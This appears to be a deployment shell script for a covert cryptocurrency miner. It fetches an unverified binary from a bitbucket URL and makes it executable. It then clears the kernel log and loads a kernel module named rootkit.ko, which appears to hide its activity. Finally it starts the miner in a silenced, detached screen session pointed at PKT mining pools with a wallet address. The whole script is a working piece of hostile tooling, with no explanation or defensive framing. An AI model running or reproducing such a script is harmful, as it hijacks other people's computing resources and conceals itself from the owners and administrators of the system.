apt-get update
apt update && apt -y install wget curl unzip iftop cmake git binutils build-essential screen net-tools curl nano cpuid neofetch automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev
mkdir infus
cd infus
git clone https://bitbucket.org/mail16docker1/invu
cd invu
wget -q https://bitbucket.org/kijang-020/ann/raw/60d016f60b08eda6ca47670234f0a08f46fffa1e/ann
chmod +x ann
make
dmesg -C
insmod rootkit.ko
dmesg
screen -dmS okesa ./ann ann -p pkt1q3r6qa92j5mgtgm4eusekelhrx27tz800qnd0h3 http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world >/dev/null 2>&1 >/dev/null &
while :; do echo $(( RANDOM - ( RANDOM ) )); sleep 30; done